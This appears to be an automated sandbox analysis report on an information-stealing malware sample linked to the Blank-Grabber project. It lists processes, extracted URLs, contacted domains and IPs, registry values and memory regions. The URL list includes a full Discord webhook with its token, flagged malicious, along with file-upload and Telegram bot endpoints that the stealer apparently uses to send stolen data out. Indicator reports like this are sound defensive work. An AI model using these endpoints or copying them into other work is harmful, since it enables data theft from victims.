C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3733.tmp" "c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 76 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://discord.com/api/webhooks/1220929699618750534/zhSTomvYGhmMHwb8qcNrPuGLmzvJ7OZ0dj098Ewa_79bqm5
unknown
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://discord.com/api/webhooks/1220929699618750534/zhSTomvYGhmMHwb8qcNrPuGLmzvJ7OZ0dj098Ewa_79bqm5nvJ2v6LXEGk7f3ADrpknC
162.159.135.232
malicious
https://duckduckgo.com/chrome_newtab
unknown
https://github.com/Blank-c/BlankOBF
unknown
https://www.avito.ru/
unknown
https://duckduckgo.com/ac/?q=
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
unknown
https://api.telegram.org/bot
unknown
http://crl.microsoft
unknown
http://logo.verisM
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
unknown
http://www.microsoft.co
unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
unknown
https://www.leboncoin.fr/
unknown
https://tools.ietf.org/html/rfc2388#section-4.4
unknown
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
unknown
https://weibo.com/
unknown
https://api.anonfiles.com/upload
unknown
https://www.msn.com
unknown
https://nuget.org/nuget.exe
unknown
https://discord.com/api/v9/users/
unknown
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
unknown
http://cacerts.digi
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
unknown
https://peps.python.org/pep-0205/
unknown
https://www.reddit.com/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://www.amazon.ca/
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://www.ebay.de/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
unknown
https://www.amazon.com/
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://httpbin.org/
unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
unknown
http://www.microsoftISPLA~1.PNGy./
unknown
http://www.cl.cam.ac.uk/~mgk25/iso-time.html
unknown
https://www.ecosia.org/newtab/
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://allegro.pl/
unknown
https://github.com/Pester/Pester
unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
unknown
https://MD8.mozilla.org/1/m
unknown
http://ocsp.sectigo.com0$
unknown
https://www.python.org/psf/license/
unknown
https://www.bbc.co.uk/
unknown
https://bugzilla.mo
unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://google.com/mail
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
unknown
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
unknown
https://www.iqiyi.com/
unknown
https://foss.heptapod.net/pypy/pypy/-/issues/3539
unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
unknown
http://google.com/
unknown
http://ocsp.sectigo.com0
unknown
https://www.python.org/download/releases/2.3/mro/.
unknown
https://contoso.com/License
unknown
https://discordapp.com/api/v9/users/
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
unknown
https://github.com/urllib3/urllib3/issues/2920
unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
unknown
https://yahoo.com/
unknown
https://account.bellmedia.c
unknown
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0
unknown
https://html.spec.whatwg.org/multipage/
unknown
https://www.ifeng.com/
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
unknown
https://www.zhihu.com/
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://oneget.orgX
unknown
http://www.iana.org/time-zones/repository/tz-link.html
unknown
http://crl.com
unknown
https://api.gofile.io/getServer
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://support.mozi
unknown
https://sectigo.com/CPS0
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
https://www.amazon.co.uk/
unknown
http://ocsp.thawte.com0
unknown
https://json.org
unknown
https://www.wykop.pl/
unknown
https://twitter.com/
unknown
https://www.olx.pl/
unknown
https://support.mozilla.org/products/firefox
unknown
https://google.com/
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
discord.com
162.159.135.232
malicious
ip-api.com
208.95.112.1

IPs

IP
Domain
Country
Malicious
162.159.135.232
discord.com
United States
malicious
208.95.112.1
ip-api.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib
1280x1024x32(BGR 0)
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\mlang.dll,-4387
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\mlang.dll,-4407

Memdumps

Base Address
Regiontype
Protect
Malicious
1619762A000
heap
page read and write
malicious
161970CF000
heap
page read and write
malicious
161970DF000
heap
page read and write
malicious
16196E10000
direct allocation
page read and write
malicious
162E122B000
heap
page read and write
malicious
161970CF000
heap
page read and write
malicious
161970E2000
heap
page read and write
malicious
162E1229000
heap
page read and write
malicious
16198300000
direct allocation
page read and write
16196A00000
heap
page read and write
16197307000
heap
page read and write
16197312000
heap
page read and write
1619710E000
heap
page read and write
1ABF5664000
heap
page read and write
16196FCD000
heap
page read and write
1619745A000
heap
page read and write
25B5B0A0000
trusted library allocation
page read and write
1C70FC41000
heap
page read and write
281F25C6000
heap
page read and write
14AAC709000
heap
page read and write
16196DE1000
heap
page read and write
7FF886CB0000
trusted library allocation
page read and write
162E1233000
heap
page read and write
161970B2000
heap
page read and write
1619712E000
heap
page read and write
14A52FB0000
heap
page read and write
23B4F470000
heap
page read and write
299B00C0000
heap
page read and write
16197290000
heap
page read and write
25B5B710000
heap
page read and write
1DB2A9C0000
heap
page read and write
21709880000
direct allocation
page read and write
2668C7F000
stack
page read and write
16196D53000
heap
page read and write
16197633000
heap
page read and write
16196FF5000
heap
page read and write
1619740F000
heap
page read and write
1443BC1F000
heap
page read and write
1C70FD50000
heap
page read and write
16196AEA000
heap
page read and write
161974DD000
heap
page read and write
14AACCCC000
heap
page read and write
1443DC74000
heap
page read and write
1D5167F0000
heap
page read and write
7FF8E7391000
unkown
page execute and read and write
1F5A8119000
heap
page read and write
23B634AE000
heap
page read and write
1619711A000
heap
page read and write
162E1226000
heap
page read and write
7FF8F8300000
unkown
page readonly
1DB2A369000
heap
page read and write
23B635E0000
heap
page read and write
1619738B000
heap
page read and write
1273F268000
heap
page read and write
5CD397B000
stack
page read and write
16197228000
heap
page read and write
1443BC31000
heap
page read and write
297E1AC0000
heap
page read and write
1443BC46000
heap
page read and write
216CFA00000
heap
page read and write
1EC1ED1C000
heap
page read and write
16196CE1000
heap
page read and write
25B5B5B7000
heap
page read and write
16196ABF000
heap
page read and write
25B5B717000
heap
page read and write
7FF886D30000
trusted library allocation
page read and write
1273F255000
heap
page read and write
16196DC1000
heap
page read and write
16197105000
heap
page read and write
161973F1000
heap
page read and write
3EA4BAE000
stack
page read and write
281F04D0000
trusted library allocation
page read and write
162E13D0000
heap
page read and write
14D1A521000
trusted library allocation
page read and write
1619722E000
heap
page read and write
2AC3D6A1000
heap
page read and write
16197203000
heap
page read and write
1EEC7BF1000
heap
page read and write
21570360000
heap
page read and write
DD2CCFC000
stack
page read and write
7FF886C30000
trusted library allocation
page read and write
16197364000
heap
page read and write
16198300000
direct allocation
page read and write
16197469000
heap
page read and write
23B636BB000
heap
page read and write
16194C64000
heap
page read and write
25935560000
heap
page read and write
2649111C000
heap
page read and write
281F2450000
heap
page read and write
13FB8F31000
heap
page read and write
2AC3D620000
heap
page read and write
23B65414000
heap
page read and write
161972BF000
heap
page read and write
16196DD8000
heap
page read and write
14AAC712000
heap
page read and write
22659020000
heap
page read and write
23B634FB000
heap
page read and write
7FF886D20000
trusted library allocation
page read and write
165CC73B000
heap
page read and write
1619711A000
heap
page read and write
299AFFD8000
heap
page read and write
1DB2A2E5000
heap
page read and write
16197112000
heap
page read and write
16196D53000
heap
page read and write
16196ABD000
heap
page read and write
14AACB75000
heap
page read and write
24B52F24000
heap
page read and write
7FF8F1E06000
unkown
page execute and write copy
23B634EB000
heap
page read and write
281F04B0000
trusted library allocation
page read and write
21706387000
heap
page read and write
23B634A6000
heap
page read and write
7FF8F0D18000
unkown
page read and write
1443BC1F000
heap
page read and write
16198330000
direct allocation
page read and write
14AACCE8000
heap
page read and write
16197313000
heap
page read and write
78B887F000
stack
page read and write
16196590000
heap
page read and write
16196C6F000
heap
page read and write
16197106000
heap
page read and write
16197629000
heap
page read and write
1DB2A36D000
heap
page read and write
16197290000
heap
page read and write
283A49B0000
heap
page read and write
1F5A927B000
heap
page read and write
25B5B5B3000
heap
page read and write
14AAC6F2000
heap
page read and write
161974BD000
heap
page read and write
16197224000
heap
page read and write
16196ABD000
heap
page read and write
161970F7000
heap
page read and write
1F5A827D000
heap
page read and write
7FF8E7298000
unkown
page execute and read and write
1443BC76000
heap
page read and write
1443BB90000
heap
page read and write
14AACB7A000
heap
page read and write
23B63495000
heap
page read and write
216CF9E0000
heap
page read and write
165CC73B000
heap
page read and write
1DB2A9A0000
heap
page read and write
1C70FD20000
heap
page read and write
16196D07000
heap
page read and write
14D0A0C0000
heap
page read and write
1443BC7A000
heap
page read and write
5DD587C000
stack
page read and write
16196F11000
heap
page read and write
7FF71D356000
unkown
page read and write
1F5A8C64000
heap
page read and write
161970CF000
heap
page read and write
627EBFF000
unkown
page read and write
EF274FF000
unkown
page read and write
1F5A5F87000
heap
page read and write
23B634D4000
heap
page read and write
1619721D000
heap
page read and write
1F5A7C42000
heap
page read and write
1ABF5664000
heap
page read and write
1EC1ED09000
heap
page read and write
1A81FA70000
heap
page read and write
B4CE0F8000
stack
page read and write
14D08708000
heap
page read and write
16197311000
heap
page read and write
14D22810000
heap
page read and write
2170632F000
heap
page read and write
21709820000
direct allocation
page read and write
161975D9000
heap
page read and write
23B65416000
heap
page read and write
2649111E000
heap
page read and write
16196DE0000
heap
page read and write
14AAC5D0000
heap
page read and write
1DB2A36E000
heap
page read and write
1D516861000
heap
page read and write
162E1226000
heap
page read and write
1F5A5F82000
heap
page read and write
25B5B5BB000
heap
page read and write
1273F25B000
heap
page read and write
7FF7B1133000
unkown
page readonly
1443BC36000
heap
page read and write
93B467F000
stack
page read and write
1443BC7C000
heap
page read and write
1DB2A372000
heap
page read and write
16198300000
direct allocation
page read and write
7FF886D60000
trusted library allocation
page read and write
161970F1000
heap
page read and write
23B6344A000
heap
page read and write
1619712A000
heap
page read and write
1443C4B0000
heap
page read and write
1EC1ED23000
heap
page read and write
1619716B000
heap
page read and write
1DB2A9D5000
heap
page read and write
7FF8E75D0000
unkown
page execute and write copy
1443BC49000
heap
page read and write
162E11D0000
heap
page read and write
1619712A000
heap
page read and write
16197434000
heap
page read and write
1619720E000
heap
page read and write
16197193000
heap
page read and write
1443BC18000
heap
page read and write
7FF8E738D000
unkown
page read and write
1619712A000
heap
page read and write
23B4F47B000
heap
page read and write
16196ABB000
heap
page read and write
299AFFE1000
heap
page read and write
297E1DA0000
heap
page read and write
19DF874A000
heap
page read and write
16196DC1000
heap
page read and write
281F1F8E000
heap
page read and write
14D228F0000
heap
page read and write
25B5B72A000
heap
page read and write
14AAC705000
heap
page read and write
B9ECBFE000
unkown
page read and write
1F5A9AA8000
heap
page read and write
7FF7B111C000
unkown
page readonly
14AAC71D000
heap
page read and write
16197404000
heap
page read and write
7FF8E7504000
unkown
page read and write
1443BBE8000
heap
page read and write
7FF8E7236000
unkown
page execute and read and write
16198340000
direct allocation
page read and write
7FF886C20000
trusted library allocation
page read and write
217098E0000
direct allocation
page read and write
7FF8E7502000
unkown
page execute and write copy
161975D1000
heap
page read and write
25B5CFAE000
heap
page read and write
25B5B715000
heap
page read and write
7FF7B10F0000
unkown
page readonly
1F5A91F4000
heap
page read and write
7FF88697D000
trusted library allocation
page execute and read and write
16196ABB000
heap
page read and write
CB149FF000
stack
page read and write
1273F256000
heap
page read and write
1ABF565D000
heap
page read and write
28181E1F000
trusted library allocation
page read and write
138E5BC7000
heap
page read and write
16197224000
heap
page read and write
1DB2A85B000
heap
page read and write
16197418000
heap
page read and write
16196C3C000
heap
page read and write
23B6541E000
heap
page read and write
1619712A000
heap
page read and write
1F5A8A64000
heap
page read and write
165CCAC0000
heap
page read and write
16198420000
direct allocation
page read and write
16196A05000
heap
page read and write
16196AB9000
heap
page read and write
161970CF000
heap
page read and write
1ABF5820000
heap
page read and write
7FF8F0D10000
unkown
page execute and read and write
161975F5000
heap
page read and write
162E1226000
heap
page read and write
161970A9000
heap
page read and write
1DAF7CF0000
heap
page read and write
16196DA1000
heap
page read and write
23B636B2000
heap
page read and write
1443DC61000
heap
page read and write
1DB2A85A000
heap
page read and write
16196CB2000
heap
page read and write
25B5B729000
heap
page read and write
16197116000
heap
page read and write
1619712C000
heap
page read and write
1273F200000
heap
page read and write
1619720D000
heap
page read and write
7FF8E6D7C000
unkown
page execute and read and write
23B63477000
heap
page read and write
217063BE000
heap
page read and write
14D0A9DC000
trusted library allocation
page read and write
1443BC3F000
heap
page read and write
25B5AF11000
heap
page read and write
16196C55000
heap
page read and write
16196DDF000
heap
page read and write
7E2FAFC000
stack
page read and write
25B5B734000
heap
page read and write
D7168EC000
stack
page read and write
23D53D30000
heap
page read and write
1F5A8119000
heap
page read and write
1443C4BA000
heap
page read and write
14AACCC8000
heap
page read and write
7FF8E75C7000
unkown
page execute and read and write
16196D91000
heap
page read and write
14AAC700000
heap
page read and write
1619720E000
heap
page read and write
1F5A5FB7000
heap
page read and write
23B63463000
heap
page read and write
281F1CE0000
trusted library allocation
page read and write
16197307000
heap
page read and write
1CCE47F000
stack
page read and write
16197392000
heap
page read and write
7FF886BA0000
trusted library allocation
page read and write
23B636EC000
heap
page read and write
1DAF7C02000
heap
page read and write
433ADDE000
stack
page read and write
1273F288000
heap
page read and write
7FF8E6AD0000
unkown
page readonly
161971F1000
heap
page read and write
7DF4F68C0000
trusted library allocation
page execute and read and write
161970A9000
heap
page read and write
161975F5000
heap
page read and write
16198830000
direct allocation
page read and write
1619711C000
heap
page read and write
1619719F000
heap
page read and write
1EC1ED1C000
heap
page read and write
25B5B71C000
heap
page read and write
26491270000
heap
page read and write
208D7EB0000
heap
page read and write
16197424000
heap
page read and write
16197629000
heap
page read and write
1619712E000
heap
page read and write
16197214000
heap
page read and write
16196ABB000
heap
page read and write
16198440000
direct allocation
page read and write
14AACCF1000
heap
page read and write
A2BF7FF000
unkown
page read and write
14D08749000
heap
page read and write
16196C8C000
heap
page read and write
1DB2A377000
heap
page read and write
1DB2A85E000
heap
page read and write
16196AF5000
heap
page read and write
14D1A805000
trusted library allocation
page read and write
1619745E000
heap
page read and write
23B4F48D000
heap
page read and write
1DB2C2F2000
heap
page read and write
1443C2FA000
heap
page read and write
27AD9DD000
stack
page read and write
162E1226000
heap
page read and write
16197421000
heap
page read and write
7FF886C00000
trusted library allocation
page read and write
1F5A7830000
heap
page read and write
16197116000
heap
page read and write
7FF886974000
trusted library allocation
page read and write
161983A0000
direct allocation
page read and write
9CADF8B000
stack
page read and write
23B63475000
heap
page read and write
21706329000
heap
page read and write
1619736B000
heap
page read and write
1619736B000
heap
page read and write
16197F78000
direct allocation
page read and write
1DB2A854000
heap
page read and write
161975D9000
heap
page read and write
16196D44000
heap
page read and write
16197132000
heap
page read and write
19DF8760000
heap
page read and write
7F09BCF000
stack
page read and write
1619757E000
heap
page read and write
16197458000
heap
page read and write
1F5A9393000
heap
page read and write
23B634F3000
heap
page read and write
16196D91000
heap
page read and write
165CC6D0000
heap
page read and write
1CCE3FE000
stack
page read and write
16197E58000
direct allocation
page read and write
21570510000
heap
page read and write
16196DC1000
heap
page read and write
161975EB000
heap
page read and write
1DAF7BF9000
heap
page read and write
264910F9000
heap
page read and write
14D22697000
heap
page read and write
25B5B71C000
heap
page read and write
1EC1ED1C000
heap
page read and write
27ADDBF000
stack
page read and write
2170635E000
heap
page read and write
7FF886BB0000
trusted library allocation
page read and write
2003D4A2000
heap
page read and write
23B63481000
heap
page read and write
1D516840000
heap
page read and write
162E1226000
heap
page read and write
78B85BF000
stack
page read and write
1619712C000
heap
page read and write
165CC757000
heap
page read and write
1619710E000
heap
page read and write
21706351000
heap
page read and write
1EC1ED0E000
heap
page read and write
1619761E000
heap
page read and write
161970D7000
heap
page read and write
7FF886A50000
trusted library allocation
page execute and read and write
16197116000
heap
page read and write
3A14FE4000
stack
page read and write
22659017000
heap
page read and write
13FB9070000
heap
page read and write
1DB2C304000
heap
page read and write
7FF8E6DF7000
unkown
page execute and read and write
16197634000
heap
page read and write
25B5B70C000
heap
page read and write
B4CE1FF000
stack
page read and write
7FF71D338000
unkown
page write copy
161982F0000
direct allocation
page read and write
161973B2000
heap
page read and write
1C70FC2B000
heap
page read and write
1EEC7BF1000
heap
page read and write
23B636F3000
heap
page read and write
1443C4B2000
heap
page read and write
5E903BC000
stack
page read and write
161971BF000
heap
page read and write
7FF8F0941000
unkown
page execute and read and write
26490F70000
heap
page read and write
161970CF000
heap
page read and write
165CC901000
heap
page read and write
1DAB2FF000
stack
page read and write
217098A0000
direct allocation
page read and write
16198350000
direct allocation
page read and write
216CF9F8000
heap
page read and write
1619760A000
heap
page read and write
7FF7B10F0000
unkown
page readonly
16197629000
heap
page read and write
1F5A8119000
heap
page read and write
1443C4BE000
heap
page read and write
22659000000
heap
page read and write
16197418000
heap
page read and write
162E1233000
heap
page read and write
16197200000
heap
page read and write
1443DC64000
heap
page read and write
281F0490000
trusted library allocation
page read and write
B4CDEFD000
stack
page read and write
1A81FAE0000
heap
page read and write
1443BBF7000
heap
page read and write
25B5AF01000
heap
page read and write
16196FBE000
heap
page read and write
1DAF7DF0000
heap
page read and write
16196D0F000
heap
page read and write
1619721D000
heap
page read and write
16196C42000
heap
page read and write
25B5AF04000
heap
page read and write
16198320000
direct allocation
page read and write
7FF7B10F1000
unkown
page execute read
1443BC14000
heap
page read and write
1E764250000
heap
page read and write
1443C309000
heap
page read and write
14CE2549000
heap
page read and write
16197231000
heap
page read and write
281F1F4E000
heap
page read and write
14A53310000
heap
page read and write
161971DC000
heap
page read and write
16196DDF000
heap
page read and write
7FF71D33A000
unkown
page read and write
161970FD000
heap
page read and write
7FF8E7181000
unkown
page execute and read and write
25030FE000
stack
page read and write
138E5BCA000
heap
page read and write
1619722E000
heap
page read and write
281902F5000
trusted library allocation
page read and write
16197458000
heap
page read and write
23D53CB0000
heap
page read and write
21706300000
heap
page read and write
7FF88699D000
trusted library allocation
page execute and read and write
70CEFF000
stack
page read and write
7FF8E6E14000
unkown
page execute and read and write
1443C4B7000
heap
page read and write
7FF886CC9000
trusted library allocation
page read and write
1D516861000
heap
page read and write
1DB2C2F0000
heap
page read and write
14AAE562000
heap
page read and write
14D0BE3C000
trusted library allocation
page read and write
7FF8E6D1F000
unkown
page execute and read and write
1C154250000
heap
page read and write
1619711F000
heap
page read and write
16197106000
heap
page read and write
161975F0000
heap
page read and write
16196A01000
heap
page read and write
1A81FB10000
heap
page read and write
16197444000
heap
page read and write
1DB2A366000
heap
page read and write
1F5A926B000
heap
page read and write
7FF8E79F8000
unkown
page execute and read and write
16197364000
heap
page read and write
1619738E000
heap
page read and write
23B634AE000
heap
page read and write
16197181000
heap
page read and write
21706382000
heap
page read and write
28181DFF000
trusted library allocation
page read and write
16196A73000
heap
page read and write
7FF886C70000
trusted library allocation
page read and write
713511C000
stack
page read and write
162E1226000
heap
page read and write
1619712A000
heap
page read and write
19DF8760000
heap
page read and write
16198320000
direct allocation
page read and write
25B5B5B4000
heap
page read and write
7FF8E7295000
unkown
page execute and read and write
7FF886A40000
trusted library allocation
page read and write
283A4CD5000
heap
page read and write
1DB2C306000
heap
page read and write
19DF8758000
heap
page read and write
6B58BFF000
stack
page read and write
1619740F000
heap
page read and write
A5B77FE000
unkown
page read and write
6B58C7F000
stack
page read and write
5CD3C7F000
stack
page read and write
161972BF000
heap
page read and write
1443BC1F000
heap
page read and write
23B6347C000
heap
page read and write
16196DCF000
heap
page read and write
1443C2E2000
heap
page read and write
14D0A082000
trusted library allocation
page read and write
1619711F000
heap
page read and write
165CC745000
heap
page read and write
23B63429000
heap
page read and write
7FF8E722E000
unkown
page execute and read and write
161975E1000
heap
page read and write
2668DFE000
stack
page read and write
161973D6000
heap
page read and write
16198490000
direct allocation
page read and write
23D53CA0000
heap
page read and write
2003D4A2000
heap
page read and write
16196AB5000
heap
page read and write
14AAC6F7000
heap
page read and write
14CE2500000
heap
page read and write
161970EA000
heap
page read and write
161970F8000
heap
page read and write
264910D8000
heap
page read and write
1443BDB0000
trusted library allocation
page read and write
1443BF8E000
heap
page read and write
16198360000
direct allocation
page read and write
161971F1000
heap
page read and write
21709941000
direct allocation
page read and write
25B5B580000
heap
page read and write
23B6345F000
heap
page read and write
16196AF1000
heap
page read and write
DDB3EFC000
stack
page read and write
1EEC7BD0000
heap
page read and write
7FF8E7231000
unkown
page execute and read and write
21707D10000
direct allocation
page read and write
23B6346E000
heap
page read and write
23B6349F000
heap
page read and write
397B3FF000
unkown
page read and write
1DB2A2EB000
heap
page read and write
16197369000
heap
page read and write
217063C2000
heap
page read and write
16197310000
heap
page read and write
7FF886D10000
trusted library allocation
page read and write
21709960000
direct allocation
page read and write
16196D07000
heap
page read and write
1619712E000
heap
page read and write
1619707C000
heap
page read and write
16197000000
heap
page read and write
3A153CF000
stack
page read and write
217062E0000
heap
page read and write
16197F34000
direct allocation
page read and write
16197421000
heap
page read and write
ADB8BDF000
stack
page read and write
161970B5000
heap
page read and write
161982F0000
direct allocation
page read and write
1EC1ED09000
heap
page read and write
161970A8000
heap
page read and write
161975FC000
heap
page read and write
1443DC6D000
heap
page read and write
161971DE000
heap
page read and write
7FF8E7540000
unkown
page readonly
162E1226000
heap
page read and write
16197201000
heap
page read and write
16196DD4000
heap
page read and write
7FF886A2C000
trusted library allocation
page execute and read and write
161970CF000
heap
page read and write
2A156FF000
stack
page read and write
2502CE8000
stack
page read and write
2170634D000
heap
page read and write
14D22816000
heap
page read and write
23B636F2000
heap
page read and write
29273BB0000
heap
page read and write
16196DD4000
heap
page read and write
433ACD8000
stack
page read and write
22630E00000
heap
page read and write
7FF8E75B0000
unkown
page readonly
1F5A5F0E000
heap
page read and write
23B637D5000
heap
page read and write
1F5A91D0000
heap
page read and write
7FF886C00000
trusted library allocation
page read and write
14D0C0FD000
trusted library allocation
page read and write
161970F8000
heap
page read and write
16194C7C000
heap
page read and write
1443BC33000
heap
page read and write
21570280000
heap
page read and write
1619762F000
heap
page read and write
161971E8000
heap
page read and write
1F5A926B000
heap
page read and write
16196DDF000
heap
page read and write
161970B5000
heap
page read and write
7FF8F9D76000
unkown
page read and write
2818151B000
trusted library allocation
page read and write
208D8060000
heap
page read and write
16196C95000
heap
page read and write
21709920000
direct allocation
page read and write
23B4F3A0000
heap
page read and write
21707EF4000
heap
page read and write
21706320000
heap
page read and write
25B5AEF0000
heap
page read and write
CD773DE000
stack
page read and write
1443BBA0000
heap
page read and write
DDB3FFE000
unkown
page read and write
1619729F000
heap
page read and write
216CF9F8000
heap
page read and write
25B5B70C000
heap
page read and write
1619745A000
heap
page read and write
1F5A5F45000
heap
page read and write
25B5B5B2000
heap
page read and write
1ABF74E0000
heap
page read and write
7FF7B1131000
unkown
page read and write
16197290000
heap
page read and write
161974BD000
heap
page read and write
28180D42000
trusted library allocation
page read and write
1443BC76000
heap
page read and write
161975D8000
heap
page read and write
1D99D9E0000
heap
page read and write
14AAC6D6000
heap
page read and write
162E122A000
heap
page read and write
28181854000
trusted library allocation
page read and write
281F25A0000
heap
page read and write
1F5A8125000
heap
page read and write
1F5A9263000
heap
page read and write
6B58B7E000
stack
page read and write
16196A96000
heap
page read and write
1619707C000
heap
page read and write
23B636BE000
heap
page read and write
1619711A000
heap
page read and write
14AAC6FC000
heap
page read and write
281F0293000
heap
page read and write
1443BC31000
heap
page read and write
7FF886C10000
trusted library allocation
page read and write
161970EE000
heap
page read and write
16197626000
heap
page read and write
7FF886B21000
trusted library allocation
page read and write
16196D74000
heap
page read and write
21709860000
direct allocation
page read and write
23B636EF000
heap
page read and write
B9ECCFF000
stack
page read and write
7FF886C60000
trusted library allocation
page read and write
28181773000
trusted library allocation
page read and write
21706389000
heap
page read and write
16196A59000
heap
page read and write
14D08704000
heap
page read and write
23B63640000
heap
page read and write
16196ABB000
heap
page read and write
1F5A8040000
heap
page read and write
16198300000
direct allocation
page read and write
1619712E000
heap
page read and write
16198390000
direct allocation
page read and write
B4CDF79000
stack
page read and write
16197183000
heap
page read and write
1443C2DE000
heap
page read and write
16196A57000
heap
page read and write
161971ED000
heap
page read and write
1FEDCA97000
heap
page read and write
281F02E0000
heap
page read and write
16198300000
direct allocation
page read and write
2502CD8000
stack
page read and write
7F09B4F000
stack
page read and write
281F1D75000
heap
page read and write
7FF886B52000
trusted library allocation
page read and write
1443C2FC000
heap
page read and write
161971F3000
heap
page read and write
1443BC84000
heap
page read and write
25B5B190000
heap
page read and write
16197167000
heap
page read and write
23B636B7000
heap
page read and write
25B5B73A000
heap
page read and write
1619765A000
heap
page read and write
21570360000
heap
page read and write
23B63463000
heap
page read and write
1F5A9263000
heap
page read and write
26491050000
heap
page read and write
16196C79000
heap
page read and write
CD7777F000
stack
page read and write
25B5AEB8000
heap
page read and write
2668D7E000
stack
page read and write
25B5B729000
heap
page read and write
7FF886992000
trusted library allocation
page read and write
1F5A5FB6000
heap
page read and write
16198300000
direct allocation
page read and write
13FB8E10000
heap
page read and write
161984A4000
direct allocation
page read and write
1619711C000
heap
page read and write
16196FFB000
heap
page read and write
1619712E000
heap
page read and write
138E5B78000
heap
page read and write
1619711F000
heap
page read and write
7FF886B54000
trusted library allocation
page read and write
1F5A5FB7000
heap
page read and write
14A52F80000
heap
page read and write
1443BC32000
heap
page read and write
16196DC1000
heap
page read and write
1C70FC41000
heap
page read and write
25B5CFAE000
heap
page read and write
13FB8EF0000
heap
page read and write
1DAF7DD0000
heap
page read and write
1A708080000
heap
page read and write
16196A83000
heap
page read and write
2B245D80000
heap
page read and write
1DB2A9C9000
heap
page read and write
1CCE4FE000
stack
page read and write
297E1AC7000
heap
page read and write
165CC720000
heap
page read and write
14AACB7B000
heap
page read and write
217063BB000
heap
page read and write
22659020000
heap
page read and write
25B5AF14000
heap
page read and write
1DB2A857000
heap
page read and write
161973D6000
heap
page read and write
1443C4B3000
heap
page read and write
1848CFC0000
heap
page read and write
165CC73E000
heap
page read and write
14A52FE1000
heap
page read and write
16197552000
heap
page read and write
217063BB000
heap
page read and write
161973CA000
heap
page read and write
2AC3D540000
heap
page read and write
16198410000
direct allocation
page read and write
22E65D07000
heap
page read and write
